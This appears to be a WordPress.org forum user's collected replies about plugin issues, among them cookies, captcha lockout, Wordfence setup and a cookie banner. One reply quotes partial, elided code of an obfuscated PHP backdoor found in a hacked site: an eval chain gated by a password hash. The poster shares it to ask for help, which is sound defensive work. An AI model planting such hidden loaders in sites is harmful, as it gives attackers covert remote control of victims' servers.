zeno001
Forum Replies Created
Ah. Solved it.
There is an interaction with the last WordPress 4.9.6 GDPR update that added the tick box “Save my name, email, and website in this browser for the next time I comment.”
If I tick that, SCE works exactly as it should.
Is that what you expect?
No, the usual box with the comment doesn’t appear. Just checked the cookies: when I submit a test comment, a cookie is set:
“Name SimpleCommentEditing1034743b52c0fdeac4efc1e586772720286ece
Value
_wpAjax3b52c0fdeac4efc1e586772720286eceaa2049b2682dbc4acb7a5ebb5693e9dc-1529854028
Host Only true
Path /
Secure false
HTTP Only false
Session false
Expiration Date 6/24/2018 16:32:11
Store Id 1”
If SCE uses AJAX, could it be the SSL Insecure Content Fixer needs to be set to include AJAX calls? I have tried turning this off completely but no difference.
Thanks Joachim.
The way I’ve done it seems to work well but wanted to check I wasn’t doing anything stupid. If I have any issues, I’ll let you know and/or try your method!
Many thanks.
Forum: Plugins
In reply to: [Donations via PayPal] Cookies
Thanks for that, mra13.
Forum: Plugins
In reply to: [Donations via PayPal] Cookies
Many thanks. I could check for cookies myself, but that would need me to make a donation to see if any were set during or after payment.
Forum: Plugins
In reply to: [Shortcode Table of Contents] CSS content selector
Still building the site. Can you explain what the parameter is looking for?
Forum: Plugins
In reply to: [Captcha] Plugin Update
Thanks for that.
I had renamed the captcha plugin directory to disable it so I could access my sites again. I can’t update the plugin because WordPress can’t find it but if I change the directory name back to ‘captcha’, I won’t be able to access the site to update the plugin.
I think the only way is to delete the plugin from the backend and reinstall – is this the best or only way to do it?
Thanks.
wfyann
Thanks. I’ll follow that procedure – or I may just wipe all the WP files and re-install (retaining the current database).
But if those files shouldn’t even be there (and I can see those directories are for js or css files, not php), can I just delete them rather than removing the rogue code? The only file that’s not obviously out of place is https.php in the wp-includes directory (and there is a http.php file already there).
Actually, thinking about it, it was a very small site anyway so I’ll just delete all the files and database and install from scratch and recreate it – it’ll be worth the effort.
Thanks for all your help.
- This reply was modified 7 years, 5 months ago by zeno001.
Just disabled high sensitivity and ran a new scan: the same files were reported.
I’m not sure when I enabled that option, but it certainly wasn’t in the past week or so.
Do you know what these files are? Are they (or were they) core WP files?
Just had a look at the first file – although it looks mostly OK and is commented, there is this in the middle:
function add_registered_taxonomy() {
global $transl_dictionary;
$transl_dictionary = create_function(‘$inp,$key’,”\44\163\151\144\40\75\40\44\137\120 ….. [a long line]
if (!function_exists(“O01100llO”)) {
function O01100llO(){global $transl_dictionary;return call_user_func($transl_dictionary,’fqOf%7bI%26%26fO … [a long line]
call_user_func(create_function(”,”\x65\x76\x61l(\x4F01100llO());”));
}
}
The long lines of encoded HTML entities decode to this:
$sid = $_POST [“sid”]; if (md5($sid) !== ‘0eee3ac0553c3c1376fa2010d8e764f5’ ) return ‘print “<!DOCTYPE HTML PUBLIC \”-//IETF//DTD HTML 2.0//EN\”><HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You do not have permission to access this folder.<HR><ADDRESS>Click here to go to the home page</ADDRESS></BODY></HTML>”;’; $sid= crc32($sid) + $key; $inp = urldecode ($inp); $t = ”; $S =’!#$%&()*+,-./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_
\'"abcdefghijklmnopqrstuvwxyz{|}~f^jAE]okI\'OzU[2&q1{3
h5w_79″4p@6\s8?BgP>dFV=mD<TcS%Ze|r:lGK/uCy.Jx)HiQ! #$~(;Lt-R}Ma,NvW+Ynb*0X’; for ($i=0; $i<strlen($inp); $i++){ $c = substr($inp,$i,1); $n = strpos($S,$c,95)-95; $r = abs(fmod($sid+$i,95)); $r = $n-$r; if ($r<0) $r = $r+95; $c = substr($S, $r, 1); $t .= $c; } return $t;
To my untrained eye, this looks dodgy!
Any ideas?
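A triage sketch for the pattern quoted in the post above, as an added example that is not part of the original forum post or of any plugin mentioned here: it decodes PHP octal and hex string escapes and flags dynamic-execution calls, including ones that only become visible after decoding. The sample input is constructed from the fragments quoted above (straight quotes, elisions kept as `...`); `decode_php_escapes` and `scan_php` are hypothetical names.

```python
import re

# PHP double-quoted string escapes: \xHH (hex) and \NNN (octal).
_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
# Three or more escapes in a row is unusual in hand-written PHP.
_ESCAPE_RUN = re.compile(r'(?:\\x[0-9A-Fa-f]{2}|\\[0-7]{2,3}){3,}')
# Calls that build or execute code at run time.
_CALLS = {
    "create_function": re.compile(r'\bcreate_function\s*\('),
    "call_user_func": re.compile(r'\bcall_user_func(?:_array)?\s*\('),
    "eval": re.compile(r'\beval\s*\('),
}

def decode_php_escapes(text):
    """Replace \\xHH and \\NNN escapes with the characters they encode."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return _ESC.sub(repl, text)

def scan_php(source):
    """Return (line, indicator, hidden) tuples; hidden=True means the
    call name only shows up once the escapes are decoded."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        decoded = decode_php_escapes(line)
        for name, rx in _CALLS.items():
            if rx.search(decoded):
                findings.append((lineno, name, not rx.search(line)))
        if _ESCAPE_RUN.search(line):
            findings.append((lineno, "escape_run", False))
    return findings

# Constructed sample based on the fragments quoted in the post.
SAMPLE = r"""function add_registered_taxonomy() {
global $transl_dictionary;
$transl_dictionary = create_function('$inp,$key',"\44\163\151\144\40\75\40\44\137\120 ...");
call_user_func(create_function('',"\x65\x76\x61l(\x4F01100llO());"));
}"""

if __name__ == "__main__":
    for lineno, name, hidden in scan_php(SAMPLE):
        print(lineno, name, "(only after decoding)" if hidden else "")
```

A hit with `hidden=True` is the stronger signal: the call name was deliberately kept out of plain-text searches.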
Thanks, wfyann. I can’t be absolutely sure, but I don’t think I had previously ignored them. The new behaviour sounds like it makes more sense!
Thanks.
And the same here. The code for this file on my website is identical to that in the current download of this plugin. The code looks suspicious because it’s unstructured but several of the plugin’s files are also done this way.
It would be good if the plugin’s author could confirm whether the code is correct or not.
Matt
That’s great. All done now and everything seems to be working OK.
Thanks for all your help.
Alan
Thanks, Matt.
Do I have to delete the Wordfence WAF lines in .htaccess AND in .user.ini (or delete it – it contains nothing else) in the root install, then configure (or re-configure) WAF in the install in the subdirectory?
Once that’s done, if I go back to the root directory install, will Wordfence ask me to configure it again or do I just reinstate the deleted lines in both files?
Richard
Great! Not sure how you tested it on my site, but I’ve updated to 1.5.2 and the banner is now at the top where it should be.
Thanks for all your help!
Updated to 1.5.1 and the link you gave shows 1.5.1, but I still have no idea what that is doing and the cookie bar is still at the bottom.
Should that have fixed the issue?
Thanks.